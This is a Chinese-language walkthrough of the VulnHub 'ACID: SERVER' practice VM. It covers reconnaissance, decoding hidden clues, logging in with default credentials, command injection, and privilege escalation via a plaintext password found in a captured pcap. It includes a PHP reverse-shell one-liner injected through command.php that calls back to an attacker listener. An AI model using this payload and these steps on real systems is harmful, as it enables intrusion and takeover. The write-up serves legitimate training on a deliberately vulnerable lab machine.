VulnHub渗透测试实战靶场 - ACID: SERVER
环境下载
戳此进行环境下载
ACID: SERVER靶机搭建
将下载好的靶机环境,导入VMware,将其网络适配设置为
NAT模式,运行即可
渗透测试
信息收集
使用Kali自带的工具
netdiscover进行子网探测:sudo netdiscover -r 192.168.246.0/24
用Nmap对获取到的靶机IP地址进行扫描:
sudo nmap -sS -A -p 1-65535 192.168.246.130,发现其33447端口是开放的
漏洞挖掘
查看33447端口:
http://192.168.246.130:33447/,F12查看源码时发现一个十六进制字符串0x643239334c6d70775a773d3d转字符串得到d293LmpwZw==解base64得到wow.jpg
用
dirsearch爆破一下web目录:python3 dirsearch.py -u 192.168.246.130:33447 -e *.php
发现存在
http://192.168.246.130:33447/images/,结合上一步解密得到的图片名字
访问:http://192.168.246.130:33447/images/wow.jpg,将图片下载下来分析:strings wow.jpg
在图片的结尾发现一串可疑字符:
37:61:65:65:30:66:36:64:35:38:38:65:64:39:39:30:35:65:65:33:37:66:31:36:61:37:63:36:31:30:64:34
用burpsuite的Decoder模块解码得到:
7aee0f6d588ed9905ee37f16a7c610d4
看长度有点像hash值,尝试MD5解密,得到:
63425
用
DirBuster扫描一下web目录,发现index.php、error.php、cake.php、hacked.php、include.php
/Challenge/index.php页面的源代码中,可以找到js/forms.js打开发现在文件中有版权信息
谷歌搜索:
peredur.net form_js,网页第一个链接就是,查看commit,在README.md中找到Email和Password相关信息
Username : test_user
Email : test@example.com
Password : 6ZaxN2Vzm9NUJT2y
利用找到的默认信息成功登录,点击页面链接跳转到
http://192.168.246.131:33447/Challenge/include.php
查看源码,在底部发现
0x5933566a4c6e4a34626e413d,依照前面的思路解密得到Y3VjLnJ4bnA=,base64再次解密得到cuc.rxnp,rot13解密得到php.ekac,反过来就是cake.php
访问
cake.php,根据页面提示再次进行目录扫描:python3 dirsearch.py -u 192.168.246.131:33447/Challenge/Magic_Box -e *.php
根据扫描结果,访问
http://192.168.246.131:33447/Challenge/Magic_Box/command.php,测试后发现存在命令执行漏洞
getshell
起一个监听,在存在命令注入的页面执行:
www.baidu.com;php -r '$sock=fsockopen("192.168.246.129",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
提权
信息查找发现两个可疑用户:
acid、saman
在acid的家目录加看到一个名为
.sudo_as_admin_successful大小为0的文件,提示普通用户可以切换为root用户
查找acid这个用户的文件来获取他的密码来切换账户:
find / -user acid 2>/dev/null,发现hint.pcapng流量包文件
用python搭建Server下载下来进行流量分析:
python -m SimpleHTTPServer 9999
分析TCP协议,可以发现一段明文传输的对话,发现
saman用户及其密码1337hax0r
用得到的密码切换saman用户后再
sudo su提权到root,成功拿到root权限